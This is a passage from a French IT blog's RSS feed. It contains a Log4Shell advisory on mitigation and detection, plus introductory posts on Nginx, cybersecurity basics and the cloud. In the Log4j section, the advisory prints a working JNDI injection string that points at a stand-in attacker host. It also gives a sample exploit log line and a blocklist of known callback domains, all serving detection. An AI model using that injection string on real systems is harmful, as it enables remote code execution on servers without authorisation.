Dubbo</li><li>Logstash</li><li>Kafka</li><li>IBM Qradar SIEM</li><li>VMWare</li><li>NetApp</li></ul><p><a href="https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592?ref=insys.fr">La liste des applications concernées</a> et <a href="https://github.com/authomize/log4j-log4shell-affected/blob/main/affected_components.md?ref=insys.fr">la liste des composants concernés</a> s'allongent également. <a href="https://github.com/YfryTchsGD/Log4jAttackSurface?ref=insys.fr">La surface d'attaque avec des exploits vérifiés</a> est également publiée par les chercheurs.<br><br></p><h2 id="comment-se-prot%C3%A9ger-de-la-vuln%C3%A9rabilit%C3%A9-de-log4j-existe-t-il-dautres-solutions-que-lapplication-de-correctifs">Comment se protéger de la vulnérabilité de Log4j ? Existe-t-il d'autres solutions que l'application de correctifs ?</h2><p>Il existe plusieurs façons de se protéger contre la vulnérabilité de log4j. Tout d'abord, mettez à niveau vers la nouvelle version, la version 2.15.0 ou supérieure. La nouvelle version, <a href="https://lists.apache.org/thread/d6v4r6nosxysyq9rvnr779336yf0woz4?ref=insys.fr">la version 2.16.0 est maintenant disponible</a>. Si vous ne pouvez pas mettre à jour pour une raison quelconque, ASF recommande les solutions intermédiaires suivantes :</p><p></p><!--kg-card-begin: markdown--><ol>
<li>Les utilisateurs de Log4j version 2.10 ou supérieure peuvent ajouter:<br>
en tant qu'option de ligne de commande ou ajoutez log4j2. &quot;formatMsgNoLookups=true&quot; à un fichier &quot;log4j2.component.properties&quot; sur le classpath pour empêcher les recherches dans les messages d'événement du journal.</li>
</ol>
<!--kg-card-end: markdown--><pre><code>-Dlog4j2.formatMsgNoLookups=true</code></pre><p><br></p><!--kg-card-begin: markdown--><ol start="2">
<li>Les utilisateurs depuis Log4j 2.7 peuvent spécifier <code>%m{nolookups}</code> dans la configuration de PatternLayout pour empêcher les recherches dans les messages d'événements de journal.</li>
</ol>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><ol start="3">
<li>Supprimez les classes JndiLookup et JndiManager du jar log4j-core. La suppression de JndiManager entraînera le dysfonctionnement de JndiContextSelector et de JMSAppender.</li>
</ol>
<!--kg-card-end: markdown--><h2 id="comment-d%C3%A9tecter-les-syst%C3%A8mes-utilisant-un-log4j-vuln%C3%A9rable"><br><br>Comment détecter les systèmes utilisant un Log4j vulnérable ?</h2><p>Exécutez la commande suivante sur vos systèmes Linux</p><pre><code>grep -r 'org/apache/logging/log4j/core/lookup/JndiLookup.class' /</code></pre><p><br>Si le résultat est "correspondance de fichiers binaires", les fichiers concernés utilisent la bibliothèque Log4j.</p><p>Vous pouvez exécuter les commandes pertinentes à partir du <a href="https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b?ref=insys.fr">dépôt GitHub</a> pour les systèmes Windows.</p><p>Divers systèmes de test sont distribués sur Internet pour les systèmes dont vous n'avez pas accès au code mais que vous soupçonnez. Vous pouvez essayer <a href="https://twitter.com/ThinkstCanary/status/1469439743905697797?ref=insys.fr">l'un de ces codes de test</a>, celui qui est fiable pour vos systèmes suspects.</p><p>Vous pouvez également utiliser des outils de test en ligne tels que <a href="https://log4shell.huntress.com/?ref=insys.fr">le service fourni par Huntress Labs</a>.</p><p>Si vous souhaitez tester plusieurs serveurs Web à partir de l'invite de commande, <a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml?ref=insys.fr">le modèle Nuclei</a> est publié. Il vous suffit d'exécuter la commande suivante pour obtenir un fichier texte contenant la liste des URL.</p><pre><code>nuclei -t cves/2021/CVE-2021-44228.yaml -list urls.txt</code></pre><p><br></p><figure class="kg-card kg-image-card kg-width-full"><img src="https://insys.fr/content/images/2021/12/Screen-Shot-2021-12-13-at-10.webp" class="kg-image" alt loading="lazy" width="1024" height="431" srcset="https://insys.fr/content/images/size/w600/2021/12/Screen-Shot-2021-12-13-at-10.webp 600w, https://insys.fr/content/images/size/w1000/2021/12/Screen-Shot-2021-12-13-at-10.webp 1000w, https://insys.fr/content/images/2021/12/Screen-Shot-2021-12-13-at-10.webp 1024w"></figure><p><br></p><h2 id="comment-exploiter-la-vuln%C3%A9rabilit%C3%A9-de-log4j-existe-t-il-un-exemple-de-code-dexploitation">Comment exploiter la vulnérabilité de Log4j ? Existe-t-il un exemple de code d'exploitation ?</h2><p>Il n'y a pas besoin de lignes de code complexes pour exploiter la vulnérabilité. La ligne suivante, ajoutée à toute entrée reçue par Log4j (il peut s'agir d'un agent utilisateur HTTP ou de données envoyées par un formulaire HTTP POST), fera fonctionner le code d'exploitation.</p><pre><code>${jndi:ldap://maliciousexternalhost.com/resource}</code></pre><p><br>La chose la plus importante à noter ici est que vous devez éviter d'exécuter des codes d'exploit avec un contenu illisible ou un contenu que vous ne pouvez pas techniquement commenter. Si vous souhaitez expérimenter avec votre serveur LDAP, <a href="https://github.com/veracode-research/rogue-jndi?ref=insys.fr">ce dépôt GitHub </a>vous sera utile.<br><br></p><h2 id="comment-pouvez-vous-d%C3%A9terminer-si-vos-syst%C3%A8mes-sont-affect%C3%A9s-en-regardant-les-journaux">Comment pouvez-vous déterminer si vos systèmes sont affectés en regardant les journaux ?</h2><p>Un exemple de journal d'exploits générera des journaux sur le serveur Web comme suit.</p><pre><code>127.0.0.1  -  - []  "GET / HTTP/1.1" 200 2595 "-"
"${jndi:ldap://127.0.0.1:12344/Basic/Command/Base64/}"</code></pre><h3 id="contr%C3%B4le-central-pour-les-syst%C3%A8mes-situ%C3%A9s-derri%C3%A8re-le-pare-feu"><br>Contrôle central pour les systèmes situés derrière le pare-feu :</h3><p>Le moyen le plus simple de savoir si quelqu'un exécute le code d'exploitation Log4j sur vos systèmes est de vérifier le trafic de vos systèmes de serveurs vers l'internet et de vérifier le trafic sur un port anormal 80, 443.</p><p>En particulier dans les environnements d'entreprise, étant donné que les systèmes de serveurs ont un accès minimal à l'internet (comme il se doit), il ne sera pas facile de l'exploiter même si une vulnérabilité est détectée. En outre, si vous pouvez examiner la partie protocole du trafic sortant, et non le port, la recherche du protocole LDAP vous facilitera également la tâche.</p><p>Les requêtes provenant des adresses DNS suivantes sont des indicateurs de l'existence d'un système présentant cette vulnérabilité et de tentatives d'exploitation. Vous devez bloquer ces tentatives en créant des règles SIEM sur le serveur DNS, le pare-feu ou l'IDS qui génèrent des alarmes et bloquent les requêtes envoyées depuis ces domaines (et également tous leurs sous-domaines).</p><pre><code>pwn.af
.*\.pwn\.af
.*\.leakix\.net
leakix.net
.*\.interactsh\.com
interactsh.com
.*\.interact\.sh
interact.sh
.*\.burpcollaborator\.net
burpcollaborator.net
.*\.bingsearchlib\.com
bingsearchlib.com
.*\.canarytokens\.com
canarytokens.com
.*\.kryptoslogic-cve-2021-44228\.com
kryptoslogic-cve-2021-44228.com
dnslog.cn
.*\.dnslog\.cn
world443.log4j.binaryedge.io
world80.log4j.binaryedge.io
requestbin.net
.*\.requestbin\.net
rce.ee
.*\.rce.ee</code></pre><h3 id="v%C3%A9rifiez-pour-chaque-syst%C3%A8me-linux"><br>Vérifiez pour chaque système Linux :</h3><p>En outre, si vous savez ou soupçonnez qu'un système Linux utilise Log4j, vous pouvez rapidement vérifier les journaux avec les commandes grep/egrep.</p><!--kg-card-begin: markdown--><p>Vous pouvez essayer la commande suivante pour savoir si un exploit a été tenté dans le contenu de tous les fichiers journaux sous <code>/var/login</code> de manière simple :</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Vous pouvez consulter <a href="https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b?ref=insys.fr">ce dépôt GitHub</a> pour rechercher les fichiers d'archives compressés sous <code>/var/log</code>.</p>
<!--kg-card-end: markdown--><pre><code>sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log</code></pre><h3 id="contr%C3%B4le-via-siem"><br>Contrôle via SIEM :</h3><!--kg-card-begin: markdown--><p>Pour le contrôle via SIEM, la recherche dans les journaux de <code>jndi:ldap, jndi:rmi, jndi:dns</code> donnera un indice.</p>
<!--kg-card-end: markdown--><h2 id="existe-t-il-des-cio-que-les-%C3%A9quipes-soc-peuvent-utiliser-pour-emp%C3%AAcher-lexploitation-de-la-vuln%C3%A9rabilit%C3%A9-sur-les-serveurs-expos%C3%A9s-%C3%A0-internet"><br><br>Existe-t-il des CIO que les équipes SOC peuvent utiliser pour empêcher l'exploitation de la vulnérabilité sur les serveurs exposés à Internet ?</h2><p>Après la publication de la vulnérabilité, les systèmes utilisant Log4j ont commencé à être détectés et exploités par des centaines d'adresses IP de différents pays.</p><p>La liste ci-dessous doit être vérifiée dans les arriérés et ajoutée à la liste de blocage pour les scans potentiels.</p><ul><li>Vous pouvez accéder à Active Scanning IP Addresses à partir du <a href="https://raw.githubusercontent.com/CriticalPathSecurity/Public-Intelligence-Feeds/master/log4j.txt?ref=insys.fr">lien GitHub ici</a></li><li>Les adresses pour appeler la charge utile téléchargeant l'exploit <a href="https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8?ref=insys.fr">sont listées ici</a></li></ul><p><br></p><h2 id="existe-t-il-des-r%C3%A8gles-pour-d%C3%A9tecter-et-pr%C3%A9venir-les-vuln%C3%A9rabilit%C3%A9s-des-syst%C3%A8mes-tels-que-waf-ips-siem">Existe-t-il des règles pour détecter et prévenir les vulnérabilités des systèmes tels que WAF, IPS, SIEM ?</h2><p>Lorsque nous regardons les premiers scans, nous voyons qu'il y a des expériences de changement d'agent utilisateur (ils envoient la partie Payload avec l'agent utilisateur) sur HTTP/HTTPS. Par conséquent, les WAF et les IPS ont un rôle essentiel dans la première phase. Cloudflare <a href="https://github.com/YfryTchsGD/Log4jAttackSurface?ref=insys.fr">a annoncé</a> que tous ses clients sont protégés contre cette vulnérabilité.</p><p>En outre, le blocage de l'accès aux ports LDAP et RMI des systèmes serveurs vers l'internet dans les règles du pare-feu réduira partiellement l'effet de l'attaque car les attaquants essaient d'envoyer le paquet exemplaire vers l'internet via LDAP, DNS et RMI pour comprendre que l'attaque a réussi.</p><p>Si vous utilisez un IDS/IPS basé sur Snort, Suricata, vous pouvez appliquer les règles à votre système en examinant les instructions ci-dessous. Vous pouvez suivre <a href="https://rules.emergingthreatspro.com/open/suricata-5.0/rules/emerging-exploit.rules?ref=insys.fr">le fichier de signature mis à jour ici</a>.</p><p><br></p><h2 id="y-a-t-il-un-groupe-de-ransomware-un-groupe-apt-ou-un-botnet-qui-exploite-activement-la-vuln%C3%A9rabilit%C3%A9-de-log4shell">Y a-t-il un groupe de ransomware, un groupe APT ou un botnet qui exploite activement la vulnérabilité de Log4Shell ?</h2><p>En date du 12 décembre, il a été observé que deux botnets, Muhstik et MIRAI, exploitent activement la vulnérabilité de la bibliothèque log4j.<br></p><p><br><em>Restez donc prudent face à cette nouvelle vulnérabilité. Nous mettrons l'article en cas de nouveaux éléments !</em></p><p></p><p><br><em>Source: <a href="https://socradar.io/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do/?ref=insys.fr#1-What-is-Log4j-What-is-it-Used-For-and-Why-is-it-so-Important">SOCRadar</a></em></p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Le parfait guide pour optimiser votre serveur Nginx ]]></title>
                    <description><![CDATA[ NGINX, prononcé comme « engine-ex », est un serveur web open-source qui, depuis son succès initial en tant que serveur web, est maintenant aussi utilisé comme reverse proxy, cache HTTP, et load balancer. ]]></description>
                    <link>https://insys.fr/blog/le-parfait-guide-pour-optimiser-votre-serveur-nginx/</link>
                    <guid isPermaLink="false">61af2fb504f732006162ac48</guid>
                    <category><![CDATA[ Open Source ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 07 Dec 2021 12:00:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2021/12/News_Banners_Nginx.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p><a href="https://www.nginx.com/?ref=insys.fr">NGINX</a>, qui se prononce comme « engine ex », c'est un logiciel open source pour le service Web, le proxy inverse, la mise en cache, l'équilibrage de charge, la diffusion multimédia en continu, etc. Il a commencé comme un serveur Web conçu pour des performances et une stabilité maximales. </p><p>En plus de ses capacités de serveur HTTP, NGINX peut également fonctionner comme serveur proxy pour la messagerie (IMAP, POP3 et SMTP) et comme proxy inverse et équilibreur de charge pour les serveurs HTTP, TCP et UDP.</p><p><em>Parmi les entreprises de renom qui utilisent NGINX figurent Autodesk, Atlassian, Intuit, T-Mobile, GitLab, DuckDuckGo, Microsoft, IBM, Google, Adobe, Adobe, Salesforce, VMWare, Xerox, LinkedIn, Cisco, Facebook, Target, Citrix Systems, Twitter, Apple, Intel et beaucoup plus (<a href="https://siftery.com/company/nginx?ref=insys.fr" rel="noopener noreferrer">source</a>).</em><br><br></p><h2 id="son-pass%C3%A9">Son passé</h2><p>Igor Sysoev a écrit à l'origine NGINX pour résoudre le problème <a href="https://fr.wikipedia.org/wiki/C10k_problem?ref=insys.fr">C10K</a>, un terme inventé en 1999 pour décrire la difficulté rencontrée par les serveurs Web existants pour gérer un grand nombre (le 10K) de connexions simultanées (le C). Avec son architecture asynchrone événementielle, <a href="https://nginx.org/en/?ref=insys.fr">NGINX</a> a révolutionné le fonctionnement des serveurs dans des contextes hautes performances et est devenu le serveur Web le plus rapide disponible.<br><br>Après avoir rendu publique le projet en 2004 et vu son utilisation croître de façon exponentielle, Sysoev a cofondé NGINX, Inc. pour soutenir le développement continu de NGINX et commercialiser <a href="https://www.nginx.com/products/nginx/?ref=insys.fr">NGINX Plus</a> en tant que produit commercial avec des fonctionnalités supplémentaires conçues pour les entreprises clientes. NGINX, Inc. fait partie de <a href="https://www.f5.com/?ref=insys.fr">F5, Inc</a>. en 2019. Aujourd'hui, NGINX et NGINX Plus peuvent gérer des centaines de milliers de connexions simultanées et <a href="https://w3techs.com/technologies/cross/web_server/ranking?ref=insys.fr">alimenter plus de sites Internet les plus fréquentés</a> que tout autre serveur.<br><br></p><h2 id="nginx-en-tant-que-serveur-web">NGINX en tant que serveur Web</h2><p>L'objectif derrière NGINX était de créer le serveur Web le plus rapide du marché, et le maintien de cette excellence est toujours <a href="https://www.nginx.com/blog/nginx-open-source-reflecting-back-and-looking-ahead/?ref=insys.fr">un objectif central du projet</a>. NGINX bat systématiquement Apache et d'autres serveurs dans l<a href="https://www.rootusers.com/linux-web-server-performance-benchmark-2016-results/?ref=insys.fr">es benchmarks mesurant les performances des serveurs Web</a>. Depuis la sortie originale de NGINX, cependant, les sites Web sont passés de simples pages HTML à un contenu dynamique à multiples facettes. <a href="https://www.nginx.com/blog/nginx-vs-apache-our-view/?ref=insys.fr">NGINX a grandi</a> et prend désormais en charge tous les composants du Web moderne, y compris WebSocket, HTTP/2, gRPC et le streaming de plusieurs formats vidéo (HDS, HLS, RTMP et autres).<br><br></p><p></p><h2 id="et-pour-finir-le-fameux-guide">Et pour finir, le fameux guide !</h2><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/trimstray/nginx-admins-handbook?ref=insys.fr#nginx-admins-handbook"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - trimstray/nginx-admins-handbook: How to improve NGINX performance, security, and other important things.</div><div class="kg-bookmark-description">How to improve NGINX performance, security, and other important things. - GitHub - trimstray/nginx-admins-handbook: How to improve NGINX performance, security, and other important things.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt=""><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">trimstray</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/e1ce7832ff5e08a5df3739e96f8dc168dafe4b947018cb47b3c69610dd824fd1/trimstray/nginx-admins-handbook" alt=""></div></a></figure><p>Ce guide est un ensemble de règles et de recommandations pour le serveur HTTP Open Source NGINX. Il contient également les meilleures pratiques, des notes et des aides avec d'innombrables exemples. Beaucoup d'entre eux font référence à des ressources externes, elles sont classées par catégories et par ordre de criticité.<br><br></p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2021/12/nginx_meme.png" class="kg-image" alt loading="lazy" width="490" height="333"></figure><p><br>À vos optimisations, vous n'avez plus d'excuses ! ?</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Qu&#x27;est-ce que la cybersécurité ? ?️ ]]></title>
                    <description><![CDATA[ La cybersécurité est l&#39;art de protéger les réseaux, les appareils et les données contre les accès non autorisés ou l&#39;utilisation criminelle et la pratique d&#39;assurer la confidentialité, l&#39;intégrité et la disponibilité des informations. ]]></description>
                    <link>https://insys.fr/blog/qu-est-ce-que-la-cybersecurite/</link>
                    <guid isPermaLink="false">61a56a9462653d0061481c06</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 30 Nov 2021 08:30:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2021/11/iso-security-dark.png" medium="image"/>
                    <content:encoded><![CDATA[ <p>La cybersécurité est l'art de protéger les réseaux, les appareils et les données contre les accès non autorisés ou l'utilisation criminelle et la pratique d'assurer la confidentialité, l'intégrité et la disponibilité des informations. Il semble que tout repose désormais sur les ordinateurs et Internet : communication (par exemple, courrier électronique, smartphones, tablettes), divertissement (par exemple, jeux vidéo interactifs, médias sociaux, applications), transport (par exemple, systèmes de navigation), achats (par exemple, en ligne achats, cartes de crédit), médicaments (par exemple, équipement médical, dossiers médicaux), et la liste est longue. </p><p><em>Dans quelle mesure votre vie quotidienne repose-t-elle sur la technologie ? Quelle quantité de vos informations personnelles est stockée sur votre propre ordinateur, smartphone, tablette ou sur le système de quelqu'un d'autre ?</em></p><p><br></p><h2 id="quels-sont-les-risques-davoir-une-mauvaise-s%C3%A9curit%C3%A9">Quels sont les risques d'avoir une mauvaise sécurité?</h2><p>Les risques sont nombreux, certains plus graves que d'autres. Parmi ces dangers figurent les logiciels malveillants qui effacent l'intégralité de votre système, un attaquant s'introduisant dans votre système et modifiant des fichiers, un attaquant utilisant votre ordinateur pour attaquer d'autres personnes ou un attaquant volant les informations de votre carte de crédit et effectuant des achats non autorisés. Il n'y a aucune garantie que même avec les meilleures précautions, certaines de ces choses ne vous arriveront pas, mais vous pouvez prendre des mesures pour minimiser les risques.</p><p><br></p><h2 id="que-pouvez-vous-faire-pour-am%C3%A9liorer-votre-s%C3%A9curit%C3%A9">Que pouvez-vous faire pour améliorer votre sécurité ?</h2><p>La première étape pour se protéger est de reconnaître les risques. Familiarisez-vous avec les termes suivants pour mieux comprendre les risques :</p><!--kg-card-begin: markdown--><ul>
<li>
<p><strong>Hacker, attaquant ou intrus</strong> : Ces termes s'appliquent aux personnes qui cherchent à exploiter les faiblesses des logiciels et des systèmes informatiques à leur propre profit. Bien que leurs intentions soient parfois bénignes et motivées par la curiosité, leurs actions sont généralement en violation de l'utilisation prévue des systèmes qu'ils exploitent. Les résultats peuvent aller d'un simple méfait (créer un virus sans impact intentionnellement négatif) à une activité malveillante (voler ou altérer des informations).</p>
</li>
<li>
<p><strong>Code malveillant</strong> : Le code malveillant (également appelé malware) est un fichier ou un programme indésirable qui peut endommager un ordinateur ou compromettre les données stockées sur un ordinateur. Diverses classifications de code malveillant incluent les virus, les vers et les chevaux de Troie. Le code malveillant peut avoir les caractéristiques suivantes :</p>
<ul>
<li>Cela peut vous obliger à faire quelque chose avant qu'il n'infecte votre ordinateur. Cette action peut être l'ouverture d'une pièce jointe à un e-mail ou l'accès à une page Web particulière.</li>
<li>Certaines formes de logiciels malveillants se propagent sans intervention de l'utilisateur et commencent généralement par exploiter une vulnérabilité logicielle. Une fois que l'ordinateur victime a été infecté, le malware tentera de trouver et d'infecter d'autres ordinateurs. Ce malware peut également se propager par e-mail, des sites Web ou des logiciels en réseau.</li>
<li>Certains logiciels malveillants prétendent être une chose, tout en faisant quelque chose de différent dans les coulisses. Par exemple, un programme qui prétend accélérer votre ordinateur peut en fait envoyer des informations confidentielles à un intrus distant.</li>
</ul>
</li>
</ul>
<!--kg-card-end: markdown--><ul><li><strong>Vulnérabilités</strong> : Les vulnérabilités sont des failles dans les logiciels, les micrologiciels ou le matériel qui peuvent être exploitées par un attaquant pour effectuer des actions non autorisées dans un système. Ils peuvent être causés par des erreurs de programmation logicielle. Les attaquants profitent de ces erreurs pour infecter les ordinateurs avec des logiciels malveillants ou effectuer d'autres activités malveillantes.</li></ul><p>Pour minimiser les risques de cyberattaques, suivez les bonnes pratiques de base en matière de cybersécurité :</p><ul><li><strong>Gardez le logiciel à jour </strong>: Installez des correctifs logiciels afin que les attaquants ne puissent pas tirer parti des problèmes ou des vulnérabilités connus. De nombreux systèmes d'exploitation proposent des mises à jour automatiques. Si cette option est disponible, vous devez l'activer.</li></ul><p></p><ul><li><strong>Exécutez un logiciel antivirus à jour </strong>: Une application logicielle antivirus réputée est une mesure de protection importante contre les menaces malveillantes connues. Il peut détecter, mettre en quarantaine et supprimer automatiquement divers types de logiciels malveillants. Assurez-vous d'activer les mises à jour automatiques des définitions de virus pour assurer une protection maximale contre les dernières menaces. Remarque : étant donné que la détection repose sur des signatures (des modèles connus qui peuvent identifier le code comme un logiciel malveillant), même le meilleur antivirus ne fournira pas de protections adéquates contre les menaces nouvelles et avancées, telles que les exploits zero-day et les virus polymorphes.</li></ul><p></p><ul><li><strong>Utilisez des mots de passe forts</strong> : Sélectionnez des mots de passe difficiles à deviner pour les attaquants et utilisez des mots de passe différents pour différents programmes et appareils. Il est préférable d'utiliser des phrases secrètes ou des mots de passe longs et forts composés d'au moins 16 caractères.</li></ul><p></p><ul><li><strong>Modifiez les noms d'utilisateur et les mots de passe par défaut</strong> : Les noms d'utilisateur et mots de passe par défaut sont facilement accessibles aux acteurs malveillants. Remplacez dès que possible les mots de passe par défaut par un mot de passe suffisamment fort et unique.</li></ul><p></p><ul><li><strong>Implémentez l'authentification multifacteur (MFA)</strong> : L'authentification est un processus utilisé pour valider l'identité d'un utilisateur. Les attaquants exploitent généralement des processus d'authentification faibles. MFA utilise au moins deux composants d'identité pour authentifier l'identité d'un utilisateur, minimisant ainsi le risque qu'un cyberattaquant accède à un compte s'il connaît le nom d'utilisateur et le mot de passe.</li></ul><p></p><ul><li><strong>Installez un pare-feu</strong> : Les pare-feu peuvent empêcher certains types de vecteurs d'attaque en bloquant le trafic malveillant avant qu'il ne puisse pénétrer dans un système informatique et en limitant les communications sortantes inutiles. Certains systèmes d'exploitation de l'appareil incluent un pare-feu. Activez et configurez correctement le pare-feu comme spécifié dans le manuel du propriétaire de l'appareil ou du système.</li></ul><p></p><ul><li><strong>Méfiez-vous des e-mails inattendus</strong> : Les e-mails de phishing sont actuellement l'un des risques les plus courants pour l'utilisateur moyen. L'objectif d'un e-mail de phishing est d'obtenir des informations sur vous, de vous voler de l'argent ou d'installer des logiciels malveillants sur votre appareil. Méfiez-vous de tous les e-mails inattendus.</li></ul><p><em>Source: CISA</em></p><p><br></p><h3 id="bon-%C3%A0-savoir">Bon à savoir </h3><p><strong>L’application des mesures</strong> préconisées par l’ANSSI, auxquelles le Centre de cyberdéfense a contribué en apportant son expérience opérationnelle, <strong>permettrait d’éviter plus de 80 % des attaques</strong> informatiques rencontrées.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.ssi.gouv.fr/entreprise/precautions-elementaires/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Précautions élémentaires</div><div class="kg-bookmark-description">La sécurité du numérique est l’affaire de tous. Elle repose avant tout sur des mesures simples et des bonnes pratiques à adopter sans modération dans la sphère privée et professionnelle. Fondées sur le bon sens, ces précautions élémentaires ne peuvent être négligées sans s’exposer à des risques, qui…</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.ssi.gouv.fr/favicon.ico" alt=""><span class="kg-bookmark-author">ANSSI</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.ssi.gouv.fr/uploads/2014/07/anssi_visuel_square500.png" alt=""></div></a></figure> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Qu’est-ce que le cloud ? ☁️ ]]></title>
                    <description><![CDATA[ Au-delà des centres de données, le cloud a été une tendance technologique révolutionnaire pour les entreprises de toutes tailles dans pratiquement tous les secteurs, et il est devenu un composant essentiel d&#39;un écosystème moderne et d&#39;une stratégie d&#39;intégration d&#39;applications. ]]></description>
                    <link>https://insys.fr/blog/qu-est-ce-que-le-cloud/</link>
                    <guid isPermaLink="false">61a00d6131fb1f00789773e3</guid>
                    <category><![CDATA[ Cloud ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Fri, 26 Nov 2021 08:30:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2021/11/image_processing20210413-4857-15bj1bk.png" medium="image"/>
                    <content:encoded><![CDATA[ <p>Au-delà des centres de données, le cloud a été une tendance technologique révolutionnaire pour les entreprises de toutes tailles dans pratiquement tous les secteurs, et il est devenu un composant essentiel d'un écosystème moderne et d'une stratégie d'intégration d'applications. </p><p>Au lieu d'investir dans du matériel coûteux tout en devant gérer et entretenir un centre de données en interne, les entreprises se tournent vers des fournisseurs de cloud comme <strong>Amazon Web Services</strong>, <strong>Google Cloud</strong> et <strong>Microsoft Azure</strong> pour une infrastructure cloud flexible afin de fournir des ressources informatiques, de mise en réseau et de stockage modernisées. Mais qu'est-ce qu'une organisation doit prendre en compte lors de la sélection et de la mise en œuvre d'une infrastructure de cloud qui convient le mieux à son écosystème commercial tout en répondant aux exigences de flux de travail et en fournissant des résultats idéaux ? </p><p><em>Ce blog couvrira les réponses à ces questions importantes et bien d'autres choses que vous devez savoir sur le cloud.</em></p><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="quest-ce-que-linfrastructure-cloud">Qu'est-ce que l'infrastructure cloud ? </h2><p>Définir exactement ce qu'est une infrastructure cloud peut être vaste et complexe. Mais au final, une infrastructure basée sur le cloud comporte plusieurs composants clés, notamment, mais sans s'y limiter, une combinaison de : </p><ul><li>Les serveurs </li><li>Logiciel </li><li>Périphériques réseau</li><li>Autres ressources de stockage </li></ul><p>Ce sont ces composants, qui sont tous nécessaires pour créer des applications qui sont ensuite accessibles via le cloud. Ces applications peuvent être récupérées à distance via Internet, les services de télécommunications, les WAN (réseaux étendus) et d'autres moyens de réseau.</p><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="comment-linfrastructure-cloud-est-elle-cat%C3%A9goris%C3%A9e">Comment l'infrastructure cloud est-elle catégorisée ?<br></h2><p>L'infrastructure cloud est généralement classée en trois parties qui collaborent toutes pour créer un service cloud :</p><ol><li><strong>Informatique </strong>: La partie informatique de l'infrastructure est fournie par des racks de serveurs afin de fournir des services cloud pour divers services et partenaires.<br><br></li><li><strong>Mise en réseau</strong> : pour transférer des données vers l'extérieur ainsi qu'entre les ordinateurs et les systèmes de stockage, cette partie de l'infrastructure s'appuie sur des routeurs et des commutateurs.<br><br></li><li><strong>Stockage</strong> : une infrastructure cloud aura probablement besoin d'un stockage considérable en utilisant souvent une combinaison de disques durs et de stockage flash.</li></ol><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="infrastructure-cloud-vs-saas-paas-et-iaas">Infrastructure cloud vs SaaS, PaaS et IaaS </h2><p>Il existe généralement trois modèles de services cloud : <strong>SaaS </strong>(Software as a Service), <strong>PaaS</strong> (Platform as a Service) et <strong>IaaS </strong>(Infrastructure as a Service). Chaque service a différents niveaux d'avantages et de différences. </p><ul><li><strong>SaaS </strong>: le logiciel en tant que service (ou services d'application cloud) est le type de service cloud le plus largement utilisé. Populaire pour les entreprises car les entreprises SaaS offrent une expérience client solide grâce à l'échange d'informations et aux services, le SaaS soulage une grande partie de la charge informatique de l'entreprise. Le SaaS utilise Internet pour fournir des applications et des services distribués, éliminant ainsi le besoin pour les clients de télécharger un logiciel. Avec le SaaS, un fournisseur de cloud gère entièrement l'ensemble de l'offre : applications, données, environnement d'exécution, middleware, systèmes d'exploitation, services, stockage, mise en réseau et virtualisation. </li></ul><p></p><ul><li><strong>PaaS </strong>: la plate-forme en tant que service est quelque peu comparable au SaaS, mais offre à la place une plate-forme pour créer des logiciels. La méthode PaaS est livrée via Internet, donnant aux équipes informatiques la possibilité de concevoir des logiciels sans se soucier d'autres aspects. Avec PaaS, le fournisseur de cloud prend en charge la majorité du service, y compris le runtime, le middleware, les systèmes d'exploitation, les serveurs, le stockage, la mise en réseau et la virtualisation. L'entreprise n'a donc à se soucier que de la gestion de ses applications et de ses données. </li></ul><p></p><ul><li><strong>IaaS </strong>: l'infrastructure en tant que service offre le contrôle le plus interne, permettant l'accès et la maintenance directe à la plupart des ressources cloud. IaaS est largement automatisé et évolutif, car les clients peuvent acheter des ressources selon leurs besoins sans dépendre du matériel interne. Avec IaaS, les services cloud sont principalement gérés par une entreprise, y compris les applications, les données, le runtime, les middleware et les systèmes d'exploitation. Mais le fournisseur de cloud est responsable des services, du stockage, de la mise en réseau et de la virtualisation.</li></ul><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="diff%C3%A9rence-entre-les-architectures-de-cloud-priv%C3%A9-public-et-hybride">Différence entre les architectures de cloud privé, public et hybride </h2><p>Une infrastructure cloud est proposée selon trois méthodes : privée, publique et hybride. Chacun offre une quantité variable de sécurité, de contrôle et de gestion. </p><ul><li><strong>Privé</strong> : avec une architecture de cloud privé, le service est effectué en interne et sur site. Les ressources sont partagées en interne entre les utilisateurs protégés pour un niveau élevé de contrôle et de sécurité des données sensibles. Cette méthode est souvent mieux exécutée lorsqu'une entreprise est suffisamment grande pour exploiter efficacement son propre centre de données cloud et dispose du budget pour le 